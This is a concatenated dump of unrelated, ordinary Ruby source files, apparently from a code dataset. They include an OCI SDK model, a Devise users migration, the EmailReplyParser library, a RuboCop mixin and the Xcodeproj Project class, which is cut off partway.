model_type == other.model_type &&
metadata == other.metadata &&
key == other.key &&
model_version == other.model_version &&
parent_ref == other.parent_ref &&
name == other.name &&
description == other.description &&
object_version == other.object_version &&
external_key == other.external_key &&
shape == other.shape &&
shape_id == other.shape_id &&
types == other.types &&
entity_type == other.entity_type &&
other_type_label == other.other_type_label &&
unique_keys == other.unique_keys &&
foreign_keys == other.foreign_keys &&
resource_name == other.resource_name &&
object_status == other.object_status &&
identifier == other.identifier
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[model_type, metadata, key, model_version, parent_ref, name, description, object_version, external_key, shape, shape_id, types, entity_type, other_type_label, unique_keys, foreign_keys, resource_name, object_status, identifier].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 41.783505 | 245 | 0.683876 |
26d15b67ac9ec8ae80cc509181534ca2f25b271f | 1,430 | class DeviseCreateUsers < ActiveRecord::Migration[4.2]
def change
create_table(:users) do |t|
## Database authenticatable
t.string :email, null: false, default: ""
t.string :encrypted_password, null: false, default: ""
## Recoverable
t.string :reset_password_token
t.datetime :reset_password_sent_at
## Rememberable
t.datetime :remember_created_at
## Trackable
t.integer :sign_in_count, default: 0
t.datetime :current_sign_in_at
t.datetime :last_sign_in_at
t.string :current_sign_in_ip
t.string :last_sign_in_ip
## Confirmable
# t.string :confirmation_token
# t.datetime :confirmed_at
# t.datetime :confirmation_sent_at
# t.string :unconfirmed_email # Only if using reconfirmable
## Lockable
# t.integer :failed_attempts, :default => 0 # Only if lock strategy is :failed_attempts
# t.string :unlock_token # Only if unlock strategy is :email or :both
# t.datetime :locked_at
## Token authenticatable
# t.string :authentication_token
t.timestamps
end
add_index :users, :email, unique: true
add_index :users, :reset_password_token, unique: true
# add_index :users, :confirmation_token, :unique => true
# add_index :users, :unlock_token, :unique => true
# add_index :users, :authentication_token, :unique => true
end
end
| 31.086957 | 94 | 0.665035 |
ff3f86f53967930cbff0b42c92290abe59dba07d | 2,097 | require 'fulfil/query'
module Fulfil
class Model
attr_reader :model_name
def initialize(client:, model_name:)
@client = client
@model_name = model_name
@query ||= Fulfil::Query.new
end
# Delegate this to the client, including the model_name so we don't have to
# type it every time.
def find(model: model_name, id:)
@client.find(model: model, id: id)
end
# Delegate this to the client, including the model_name so we don't have to
# type it every time.
def search(
model: model_name,
domain:,
fields: %w[id rec_name],
limit: nil,
offset: nil,
sort: nil
)
@client.search(
model: model,
domain: domain,
fields: fields,
limit: limit,
offset: offset,
sort: sort
)
end
def count(domain:)
@client.count(model: model_name, domain: domain)
end
def all
search(domain: query)
end
def query(**args)
@query.search(**args).query if args.any?
@query.query
end
def attributes
results = @client.search(model: model_name, domain: [], limit: 1)
@client.find(model: model_name, id: results.first.dig('id'))
end
def fetch_associated(models:, association_name:, source_key:, fields:)
source_keys = source_key.split('.')
associated_ids =
models.map { |model| model.dig(*source_keys) }.flatten.compact.uniq
return [] if associated_ids.none?
associated_models =
@client.find(
model: association_name, ids: associated_ids, fields: fields
)
associated_models_by_id = associated_models.map { |m| [m['id'], m] }.to_h
models.each do |model|
filtered_models =
model.dig(*source_keys).map { |id| associated_models_by_id[id] }
if source_keys.length > 1
model.dig(*source_keys[0..-2]).store(
source_keys.last,
filtered_models
)
else
model[source_keys.first] = filtered_models
end
end
end
end
end
| 24.103448 | 79 | 0.595613 |
e2e8302488bebe77f3b9e6491b2465a91fe46327 | 1,476 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
5
describe ::API::V3::Queries::Schemas::RelatesFilterDependencyRepresenter, clear_cache: true do
it_behaves_like 'relation filter dependency' do
let(:filter) { Queries::WorkPackages::Filter::RelatesFilter.create!(context: query) }
end
end
| 41 | 94 | 0.76626 |
e81cbcbc96d1f83dcf1bd6ec860e93fcbb8e8172 | 8,101 | require 'strscan'
# EmailReplyParser is a small library to parse plain text email content. The
# goal is to identify which fragments are quoted, part of a signature, or
# original body content. We want to support both top and bottom posters, so
# no simple "REPLY ABOVE HERE" content is used.
#
# Beyond RFC 5322 (which is handled by the [Ruby mail gem][mail]), there aren't
# any real standards for how emails are created. This attempts to parse out
# common conventions for things like replies:
#
# this is some text
#
# On <date>, <author> wrote:
# > blah blah
# > blah blah
#
# ... and signatures:
#
# this is some text
#
# --
# Bob
# http://homepage.com/~bob
#
# Each of these are parsed into Fragment objects.
#
# EmailReplyParser also attempts to figure out which of these blocks should
# be hidden from users.
#
# [mail]: https://github.com/mikel/mail
class EmailReplyParser
VERSION = "0.5.9"
# Public: Splits an email body into a list of Fragments.
#
# text - A String email body.
#
# Returns an Email instance.
def self.read(text)
Email.new.read(text)
end
# Public: Get the text of the visible portions of the given email body.
#
# text - A String email body.
#
# Returns a String.
def self.parse_reply(text)
self.read(text).visible_text
end
### Emails
# An Email instance represents a parsed body String.
class Email
# Emails have an Array of Fragments.
attr_reader :fragments
def initialize
@fragments = []
end
# Public: Gets the combined text of the visible fragments of the email body.
#
# Returns a String.
def visible_text
fragments.select{|f| !f.hidden?}.map{|f| f.to_s}.join("\n").rstrip
end
# Splits the given text into a list of Fragments. This is roughly done by
# reversing the text and parsing from the bottom to the top. This way we
# can check for 'On <date>, <author> wrote:' lines above quoted blocks.
#
# text - A String email body.
#
# Returns this same Email instance.
def read(text)
text = text.dup
# Normalize line endings.
text.gsub!("\r\n", "\n")
# Check for multi-line reply headers. Some clients break up
# the "On DATE, NAME <EMAIL> wrote:" line into multiple lines.
if text =~ /^(?!On.*On\s.+?wrote:)(On\s(.+?)wrote:)$/m
# Remove all new lines from the reply header.
text.gsub! $1, $1.gsub("\n", " ")
end
# Some users may reply directly above a line of underscores.
# In order to ensure that these fragments are split correctly,
# make sure that all lines of underscores are preceded by
# at least two newline characters.
text.gsub!(/([^\n])(?=\n_{7}_+)$/m, "\\1\n")
# The text is reversed initially due to the way we check for hidden
# fragments.
text = text.reverse
# This determines if any 'visible' Fragment has been found. Once any
# visible Fragment is found, stop looking for hidden ones.
@found_visible = false
# This instance variable points to the current Fragment. If the matched
# line fits, it should be added to this Fragment. Otherwise, finish it
# and start a new Fragment.
@fragment = nil
# Use the StringScanner to pull out each line of the email content.
@scanner = StringScanner.new(text)
while line = @scanner.scan_until(/\n/)
scan_line(line)
end
# Be sure to parse the last line of the email.
if (last_line = @scanner.rest.to_s).size > 0
scan_line(last_line)
end
# Finish up the final fragment. Finishing a fragment will detect any
# attributes (hidden, signature, reply), and join each line into a
# string.
finish_fragment
@scanner = @fragment = nil
# Now that parsing is done, reverse the order.
@fragments.reverse!
self
end
private
EMPTY = "".freeze
SIGNATURE = '(?m)(--\s*$|__\s*$|\w-$)|(^(\w+\s*){1,3} ym morf tneS$)'
begin
require 're2'
SIG_REGEX = RE2::Regexp.new(SIGNATURE)
rescue LoadError
SIG_REGEX = Regexp.new(SIGNATURE)
end
### Line-by-Line Parsing
# Scans the given line of text and figures out which fragment it belongs
# to.
#
# line - A String line of text from the email.
#
# Returns nothing.
def scan_line(line)
line.chomp!("\n")
line.lstrip! unless SIG_REGEX.match(line)
# We're looking for leading `>`'s to see if this line is part of a
# quoted Fragment.
is_quoted = !!(line =~ /(>+)$/)
# Mark the current Fragment as a signature if the current line is empty
# and the Fragment starts with a common signature indicator.
if @fragment && line == EMPTY
if SIG_REGEX.match @fragment.lines.last
@fragment.signature = true
finish_fragment
end
end
# If the line matches the current fragment, add it. Note that a common
# reply header also counts as part of the quoted Fragment, even though
# it doesn't start with `>`.
if @fragment &&
((@fragment.quoted? == is_quoted) ||
(@fragment.quoted? && (quote_header?(line) || line == EMPTY)))
@fragment.lines << line
# Otherwise, finish the fragment and start a new one.
else
finish_fragment
@fragment = Fragment.new(is_quoted, line)
end
end
# Detects if a given line is a header above a quoted area. It is only
# checked for lines preceding quoted regions.
#
# line - A String line of text from the email.
#
# Returns true if the line is a valid header, or false.
def quote_header?(line)
line =~ /^:etorw.*nO$/ || line =~ /^.*:(morF|tneS|oT|tcejbuS)$/
end
# Builds the fragment string and reverses it, after all lines have been
# added. It also checks to see if this Fragment is hidden. The hidden
# Fragment check reads from the bottom to the top.
#
# Any quoted Fragments or signature Fragments are marked hidden if they
# are below any visible Fragments. Visible Fragments are expected to
# contain original content by the author. If they are below a quoted
# Fragment, then the Fragment should be visible to give context to the
# reply.
#
# some original text (visible)
#
# > do you have any two's? (quoted, visible)
#
# Go fish! (visible)
#
# > --
# > Player 1 (quoted, hidden)
#
# --
# Player 2 (signature, hidden)
#
def finish_fragment
if @fragment
@fragment.finish
if !@found_visible
if @fragment.quoted? || @fragment.signature? ||
@fragment.to_s.strip == EMPTY
@fragment.hidden = true
else
@found_visible = true
end
end
@fragments << @fragment
end
@fragment = nil
end
end
### Fragments
# Represents a group of paragraphs in the email sharing common attributes.
# Paragraphs should get their own fragment if they are a quoted area or a
# signature.
class Fragment < Struct.new(:quoted, :signature, :hidden)
# This is an Array of String lines of content. Since the content is
# reversed, this array is backwards, and contains reversed strings.
attr_reader :lines,
# This is reserved for the joined String that is build when this Fragment
# is finished.
:content
def initialize(quoted, first_line)
self.signature = self.hidden = false
self.quoted = quoted
@lines = [first_line]
@content = nil
@lines.compact!
end
alias quoted? quoted
alias signature? signature
alias hidden? hidden
# Builds the string content by joining the lines and reversing them.
#
# Returns nothing.
def finish
@content = @lines.join("\n")
@lines = nil
@content.reverse!
end
def to_s
@content
end
def inspect
to_s.inspect
end
end
end
| 29.245487 | 80 | 0.624985 |
ab61ddd9cfbf4e996a28be28d1051aec89177669 | 1,518 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'git-process/git_process'
module GitProc
class NewFeatureBranch < Process
def initialize(dir, opts)
@branch_name = opts[:branch_name]
@local_only = opts[:local]
super
end
def runner
mybranches = gitlib.branches()
on_parking = (mybranches.parking == mybranches.current)
base_branch = if on_parking and not mybranches[config.integration_branch].contains_all_of(mybranches.parking.name)
'_parking_'
else
config.integration_branch
end
gitlib.fetch if gitlib.has_a_remote? and not @local_only
logger.info { "Creating #{@branch_name} off of #{base_branch}" }
new_branch = gitlib.checkout(@branch_name, :new_branch => base_branch)
branches = gitlib.branches()
branches[@branch_name].upstream(config.integration_branch)
branches.parking.delete! if on_parking
new_branch
end
end
end
| 30.36 | 120 | 0.689723 |
e86e5d851be3b05973d78b18c97c76a3129ee53f | 1,473 | # frozen_string_literal: true
module RuboCop
module Cop
# This module provides functionality for checking if numbering match the
# configured EnforcedStyle.
module ConfigurableNumbering
include ConfigurableEnforcedStyle
SNAKE_CASE = /(?:[a-z_]|_\d+)$/
NORMAL_CASE = /(?:_\D*|[A-Za-z]\d*)$/
NON_INTEGER = /[A-Za-z_]$/
def check_name(node, name, name_range)
return if operator?(name)
if valid_name?(node, name)
correct_style_detected
else
add_offense(node, name_range, message(style))
end
end
def valid_name?(node, name)
pattern =
case style
when :snake_case
SNAKE_CASE
when :normalcase
NORMAL_CASE
when :non_integer
NON_INTEGER
end
name.match(pattern) || class_emitter_method?(node, name)
end
# A class emitter method is a singleton method in a class/module, where
# the method has the same name as a class defined in the class/module.
def class_emitter_method?(node, name)
return false unless node.parent && node.defs_type?
# a class emitter method may be defined inside `def self.included`,
# `def self.extended`, etc.
node = node.parent while node.parent.defs_type?
node.parent.each_child_node(:class).any? do |c|
c.loc.name.is?(name.to_s)
end
end
end
end
end
| 28.326923 | 77 | 0.610319 |
39eea38318a89b89297ba9e4f1ed9fe79beda234 | 772 | require 'forwardable'
require 'flat_hash/directory'
require 'flat_hash/git'
require 'flat_hash/hg'
class FlatHash::Repository < FlatHash::Directory
extend Forwardable
def_delegators :@vcs, :changesets, :addremovecommit
def initialize serialiser, path
super
@vcs = FlatHash::Git.new if File.exist?('.git')
@vcs = FlatHash::Hg.new if File.exist?('.hg')
end
def vcs_supported?
[email protected]?
end
def history key=nil
return [] unless vcs_supported?
path = key ? File.join(@path, key) : @path
@vcs.changesets(path).map {|cs| @vcs.changeset cs }
end
def element_at changeset, key
return {} unless vcs_supported?
content = @vcs.content_at(File.join(@path, key),changeset)
@serialiser.read StringIO.new(content)
end
end | 24.903226 | 62 | 0.695596 |
6ad89d3d5bebc92101e8ac878fdc09ccbb18c7dd | 936 | # frozen_string_literal: true
require 'test/unit'
require_relative '../Core/menu'
# Tests for the Game class
class MenuTest < Test::Unit::TestCase
def setup
@menu = Menu.new(%w[Start Exit], 'Normal')
end
def test_options_initialized
assert_equal(@menu.options, %w[Start Exit])
end
def test_title_initialized
assert_equal(@menu.title, 'Normal')
end
def test_index_initialized
assert_equal(@menu.current_index, 0)
end
def test_correct_option
assert_equal(@menu.current_option, 'Start')
end
def test_main_menu_initializes
menu = MainMenu.new(nil, nil)
assert_equal(menu.title, 'Main Menu')
assert_equal(menu.options, ['Start Game', 'Controls', 'Help', 'More Info', 'Exit'])
end
def test_game_menu_initializes
menu = GameMenu.new(nil, nil)
assert_equal(menu.title, 'Game Menu')
assert_equal(menu.options, ['Continue', 'Controls', 'Help', 'Main Menu'])
end
end
| 23.4 | 87 | 0.706197 |
289dcca77af7c06cf99c1bcf5a6d3fc3830dbcab | 796 | module ApplicationHelper
def divide_in_chunks(arr, chunk_size)
chunks = {}
chunk_idx = 0
arr.each_with_index do |item,idx|
chunks[chunk_idx] ||= []
chunks[chunk_idx] << item
if (idx+1)%chunk_size == 0
chunk_idx=chunk_idx+1
end
end
chunks
end
def gravatar_url(user)
"http://www.gravatar.com/avatar/#{Digest::MD5.hexdigest(user.email.downcase)}?s=40"
end
def select_collection_rating_values
Review.rating_range.to_a.reverse.map do |rating|
[ pluralize(rating, 'star'), rating]
end
end
def select_collection_category_values
Category.all.map do |category|
[ category.name, category.id ]
end
end
def select_rating_values
(0.0..5.0).step(0.1).map(&Proc.new{ |v| v.round(2).to_f })
end
end
| 22.111111 | 87 | 0.654523 |
4aec938a5840327013ea9944ef8ada83e0b01535 | 24,711 | require 'fileutils'
require 'securerandom'
require 'xcodeproj/project/object'
require 'xcodeproj/project/project_helper'
require 'xcodeproj/plist_helper'
module Xcodeproj
# This class represents a Xcode project document.
#
# It can be used to manipulate existing documents or even create new ones
# from scratch.
#
# An Xcode project document is a plist file where the root is a dictionary
# containing the following keys:
#
# - archiveVersion: the version of the document.
# - objectVersion: the version of the objects description.
# - classes: a key that apparently is always empty.
# - objects: a dictionary where the UUID of every object is associated to
# its attributes.
# - rootObject: the UUID identifier of the root object ({PBXProject}).
#
# Every object is in turn a dictionary that specifies an `isa` (the class of
# the object) and in accordance to it maintains a set attributes. Those
# attributes might reference one or more other objects by UUID. If the
# reference is a collection, it is ordered.
#
# The {Project} API returns instances of {AbstractObject} which wrap the
# objects described in the Xcode project document. All the attributes types
# are preserved from the plist, except for the relationships which are
# replaced with objects instead of UUIDs.
#
# An object might be referenced by multiple objects, an when no other object
# is references it, it becomes unreachable (the root object is referenced by
# the project itself). Xcodeproj takes care of adding and removing those
# objects from the `objects` dictionary so the project is always in a
# consistent state.
#
class Project
include Object
# @return [Pathname] the path of the project.
#
attr_reader :path
# @param [Pathname, String] path @see path
# The path provided will be expanded to an absolute path.
# @param [Bool] skip_initialization
# Wether the project should be initialized from scratch.
# @param [Int] object_version
# Object version to use for serialization, defaults to Xcode 3.2 compatible.
#
# @example Creating a project
# Project.new("path/to/Project.xcodeproj")
#
def initialize(path, skip_initialization = false, object_version = Constants::DEFAULT_OBJECT_VERSION)
@path = Pathname.new(path).expand_path
@objects_by_uuid = {}
@generated_uuids = []
@available_uuids = []
unless skip_initialization
initialize_from_scratch
@object_version = object_version.to_s
end
unless skip_initialization.is_a?(TrueClass) || skip_initialization.is_a?(FalseClass)
raise ArgumentError, '[Xcodeproj] Initialization parameter expected to ' \
"be a boolean #{skip_initialization}"
end
end
# Opens the project at the given path.
#
# @param [Pathname, String] path
# The path to the Xcode project document (xcodeproj).
#
# @raise If the project versions are more recent than the ones know to
# Xcodeproj to prevent it from corrupting existing projects.
# Naturally, this would never happen with a project generated by
# xcodeproj itself.
#
# @raise If it can't find the root object. This means that the project is
# malformed.
#
# @example Opening a project
# Project.open("path/to/Project.xcodeproj")
#
def self.open(path)
path = Pathname.pwd + path
unless Pathname.new(path).exist?
raise "[Xcodeproj] Unable to open `#{path}` because it doesn't exist."
end
project = new(path, true)
project.send(:initialize_from_file)
project
end
# @return [String] the archive version.
#
attr_reader :archive_version
# @return [Hash] an dictionary whose purpose is unknown.
#
attr_reader :classes
# @return [String] the objects version.
#
attr_reader :object_version
# @return [Hash{String => AbstractObject}] A hash containing all the
# objects of the project by UUID.
#
attr_reader :objects_by_uuid
# @return [PBXProject] the root object of the project.
#
attr_reader :root_object
# A fast way to see if two {Project} instances refer to the same projects on
# disk. Use this over {#eql?} when you do not need to compare the full data.
#
# This shallow comparison was chosen as the (common) `==` implementation,
# because it was too easy to introduce changes into the Xcodeproj code-base
# that were slower than O(1).
#
# @return [Boolean] whether or not the two `Project` instances refer to the
# same projects on disk, determined solely by {#path} and
# `root_object.uuid` equality.
#
# @todo If ever needed, we could also compare `uuids.sort` instead.
#
def ==(other)
other && path == other.path && root_object.uuid == other.root_object.uuid
end
# Compares the project to another one, or to a plist representation.
#
# @note This operation can be extremely expensive, because it converts a
# `Project` instance to a hash, and should _only_ ever be used to
# determine wether or not the data contents of two `Project` instances
# are completely equal.
#
# To simply determine wether or not two {Project} instances refer to
# the same projects on disk, use the {#==} method instead.
#
# @param [#to_hash] other the object to compare.
#
# @return [Boolean] whether the project is equivalent to the given object.
#
def eql?(other)
other.respond_to?(:to_hash) && to_hash == other.to_hash
end
def to_s
"#<#{self.class}> path:`#{path}` UUID:`#{root_object.uuid}`"
end
alias_method :inspect, :to_s
public
# @!group Initialization
#-------------------------------------------------------------------------#
# Initializes the instance from scratch.
#
def initialize_from_scratch
@archive_version = Constants::LAST_KNOWN_ARCHIVE_VERSION.to_s
@classes = {}
root_object.remove_referrer(self) if root_object
@root_object = new(PBXProject)
root_object.add_referrer(self)
root_object.main_group = new(PBXGroup)
root_object.product_ref_group = root_object.main_group.new_group('Products')
config_list = new(XCConfigurationList)
root_object.build_configuration_list = config_list
config_list.default_configuration_name = 'Release'
config_list.default_configuration_is_visible = '0'
add_build_configuration('Debug', :debug)
add_build_configuration('Release', :release)
new_group('Frameworks')
end
# Initializes the instance with the project stored in the `path` attribute.
#
def initialize_from_file
pbxproj_path = path + 'project.pbxproj'
plist = Xcodeproj.read_plist(pbxproj_path.to_s)
root_object.remove_referrer(self) if root_object
@root_object = new_from_plist(plist['rootObject'], plist['objects'], self)
@archive_version = plist['archiveVersion']
@object_version = plist['objectVersion']
@classes = plist['classes']
unless root_object
raise "[Xcodeproj] Unable to find a root object in #{pbxproj_path}."
end
if archive_version.to_i > Constants::LAST_KNOWN_ARCHIVE_VERSION
raise '[Xcodeproj] Unknown archive version.'
end
if object_version.to_i > Constants::LAST_KNOWN_OBJECT_VERSION
raise '[Xcodeproj] Unknown object version.'
end
end
public
# @!group Plist serialization
#-------------------------------------------------------------------------#
# Creates a new object from the given UUID and `objects` hash (of a plist).
#
# The method sets up any relationship of the new object, generating the
# destination object(s) if not already present in the project.
#
# @note This method is used to generate the root object
# from a plist. Subsequent invocation are called by the
# {AbstractObject#configure_with_plist}. Clients of {Xcodeproj} are
# not expected to call this method.
#
# @param [String] uuid
# The UUID of the object that needs to be generated.
#
# @param [Hash {String => Hash}] objects_by_uuid_plist
# The `objects` hash of the plist representation of the project.
#
# @param [Boolean] root_object
# Whether the requested object is the root object and needs to be
# retained by the project before configuration to add it to the
# `objects` hash and avoid infinite loops.
#
# @return [AbstractObject] the new object.
#
# @visibility private.
#
def new_from_plist(uuid, objects_by_uuid_plist, root_object = false)
attributes = objects_by_uuid_plist[uuid]
if attributes
klass = Object.const_get(attributes['isa'])
object = klass.new(self, uuid)
object.add_referrer(self) if root_object
object.configure_with_plist(objects_by_uuid_plist)
object
end
end
# @return [Hash] The hash representation of the project.
#
def to_hash
plist = {}
objects_dictionary = {}
objects.each { |obj| objects_dictionary[obj.uuid] = obj.to_hash }
plist['objects'] = objects_dictionary
plist['archiveVersion'] = archive_version.to_s
plist['objectVersion'] = object_version.to_s
plist['classes'] = classes
plist['rootObject'] = root_object.uuid
plist
end
# Converts the objects tree to a hash substituting the hash
# of the referenced to their UUID reference. As a consequence the hash of
# an object might appear multiple times and the information about their
# uniqueness is lost.
#
# This method is designed to work in conjunction with {Hash#recursive_diff}
# to provide a complete, yet readable, diff of two projects *not* affected
# by differences in UUIDs.
#
# @return [Hash] a hash representation of the project different from the
# plist one.
#
def to_tree_hash
hash = {}
objects_dictionary = {}
hash['objects'] = objects_dictionary
hash['archiveVersion'] = archive_version.to_s
hash['objectVersion'] = object_version.to_s
hash['classes'] = classes
hash['rootObject'] = root_object.to_tree_hash
hash
end
# @return [Hash{String => Hash}] A hash suitable to display the project
# to the user.
#
def pretty_print
build_configurations = root_object.build_configuration_list.build_configurations
{
'File References' => root_object.main_group.pretty_print.values.first,
'Targets' => root_object.targets.map(&:pretty_print),
'Build Configurations' => build_configurations.sort_by(&:name).map(&:pretty_print),
}
end
# Serializes the project in the xcodeproj format using the path provided
# during initialization or the given path (`xcodeproj` file). If a path is
# provided file references depending on the root of the project are not
# updated automatically, thus clients are responsible to perform any needed
# modification before saving.
#
# @param [String, Pathname] path
# The optional path where the project should be saved.
#
# @example Saving a project
# project.save
# project.save
#
# @return [void]
#
def save(save_path = nil)
save_path ||= path
FileUtils.mkdir_p(save_path)
file = File.join(save_path, 'project.pbxproj')
Xcodeproj.write_plist(to_hash, file)
end
public
# @!group Creating objects
#-------------------------------------------------------------------------#
# Creates a new object with a suitable UUID.
#
# The object is only configured with the default values of the `:simple`
# attributes, for this reason it is better to use the convenience methods
# offered by the {AbstractObject} subclasses or by this class.
#
# @param [Class, String] klass
# The concrete subclass of AbstractObject for new object or its
# ISA.
#
# @return [AbstractObject] the new object.
#
def new(klass)
if klass.is_a?(String)
klass = Object.const_get(klass)
end
object = klass.new(self, generate_uuid)
object.initialize_defaults
object
end
# Generates a UUID unique for the project.
#
# @note UUIDs are not guaranteed to be generated unique because we need
# to trim the ones generated in the xcodeproj extension.
#
# @note Implementation detail: as objects usually are created serially
# this method creates a batch of UUID and stores the not colliding
# ones, so the search for collisions with known UUIDS (a
# performance bottleneck) is performed less often.
#
# @return [String] A UUID unique to the project.
#
def generate_uuid
generate_available_uuid_list while @available_uuids.empty?
@available_uuids.shift
end
# @return [Array<String>] the list of all the generated UUIDs.
#
# @note Used for checking new UUIDs for duplicates with UUIDs already
# generated but used for objects which are not yet part of the
# `objects` hash but which might be added at a later time.
#
attr_reader :generated_uuids
# Pre-generates the given number of UUIDs. Useful for optimizing
# performance when the rough number of objects that will be created is
# known in advance.
#
# @param [Integer] count
# the number of UUIDs that should be generated.
#
# @note This method might generated a minor number of uniques UUIDs than
# the given count, because some might be duplicated a thus will be
# discarded.
#
# @return [void]
#
def generate_available_uuid_list(count = 100)
new_uuids = (0..count).map { SecureRandom.hex(12).upcase }
uniques = (new_uuids - (@generated_uuids + uuids))
@generated_uuids += uniques
@available_uuids += uniques
end
public
# @!group Convenience accessors
#-------------------------------------------------------------------------#
# @return [Array<AbstractObject>] all the objects of the project.
#
def objects
objects_by_uuid.values
end
# @return [Array<String>] all the UUIDs of the project.
#
def uuids
objects_by_uuid.keys
end
# @return [Array<AbstractObject>] all the objects of the project with a
# given ISA.
#
def list_by_class(klass)
objects.select { |o| o.class == klass }
end
# @return [PBXGroup] the main top-level group.
#
def main_group
root_object.main_group
end
# @return [ObjectList<PBXGroup>] a list of all the groups in the
# project.
#
def groups
main_group.groups
end
# Returns a group at the given subpath relative to the main group.
#
# @example
# frameworks = project['Frameworks']
# frameworks.name #=> 'Frameworks'
# main_group.children.include? frameworks #=> True
#
# @param [String] group_path @see MobileCoreServices
#
# @return [PBXGroup] the group at the given subpath.
#
def [](group_path)
main_group[group_path]
end
# @return [ObjectList<PBXFileReference>] a list of all the files in the
# project.
#
def files
objects.grep(PBXFileReference)
end
# Returns the file reference for the given absolute path.
#
# @param [#to_s] absolute_path
# The absolute path of the file whose reference is needed.
#
# @return [PBXFileReference] The file reference.
# @return [Nil] If no file reference could be found.
#
def reference_for_path(absolute_path)
absolute_pathname = Pathname.new(absolute_path)
unless absolute_pathname.absolute?
raise ArgumentError, "Paths must be absolute #{absolute_path}"
end
objects.find do |child|
child.isa == 'PBXFileReference' && child.real_path == absolute_pathname
end
end
# @return [ObjectList<AbstractTarget>] A list of all the targets in the
# project.
#
def targets
root_object.targets
end
# @return [ObjectList<PBXNativeTarget>] A list of all the targets in the
# project excluding aggregate targets.
#
def native_targets
root_object.targets.grep(PBXNativeTarget)
end
# @return [PBXGroup] The group which holds the product file references.
#
def products_group
root_object.product_ref_group
end
# @return [ObjectList<PBXFileReference>] A list of the product file
# references.
#
def products
products_group.children
end
# @return [PBXGroup] the `Frameworks` group creating it if necessary.
#
def frameworks_group
main_group['Frameworks'] || main_group.new_group('Frameworks')
end
# @return [ObjectList<XCConfigurationList>] The build configuration list of
# the project.
#
def build_configuration_list
root_object.build_configuration_list
end
# @return [ObjectList<XCBuildConfiguration>] A list of project wide
# build configurations.
#
def build_configurations
root_object.build_configuration_list.build_configurations
end
# Returns the build settings of the project wide build configuration with
# the given name.
#
# @param [String] name
# The name of a project wide build configuration.
#
# @return [Hash] The build settings.
#
def build_settings(name)
root_object.build_configuration_list.build_settings(name)
end
public
# @!group Helpers
#-------------------------------------------------------------------------#
# Creates a new file reference in the main group.
#
# @param @see PBXGroup#new_file
#
# @return [PBXFileReference] the new file.
#
def new_file(path, source_tree = :group)
main_group.new_file(path, source_tree)
end
# Creates a new group at the given subpath of the main group.
#
# @param @see PBXGroup#new_group
#
# @return [PBXGroup] the new group.
#
def new_group(name, path = nil, source_tree = :group)
main_group.new_group(name, path, source_tree)
end
# Creates a new target and adds it to the project.
#
# The target is configured for the given platform and its file reference it
# is added to the {products_group}.
#
# The target is pre-populated with common build settings, and the
# appropriate Framework according to the platform is added to to its
# Frameworks phase.
#
# @param [Symbol] type
# the type of target. Can be `:application`, `:framework`,
# `:dynamic_library` or `:static_library`.
#
# @param [String] name
# the name of the target product.
#
# @param [Symbol] platform
# the platform of the target. Can be `:ios` or `:osx`.
#
# @param [String] deployment_target
# the deployment target for the platform.
#
# @param [Symbol] language
# the primary language of the target, can be `:objc` or `:swift`.
#
# @return [PBXNativeTarget] the target.
#
def new_target(type, name, platform, deployment_target = nil, product_group = nil, language = nil)
product_group ||= products_group
ProjectHelper.new_target(self, type, name, platform, deployment_target, product_group, language)
end
# Creates a new resource bundles target and adds it to the project.
#
# The target is configured for the given platform and its file reference it
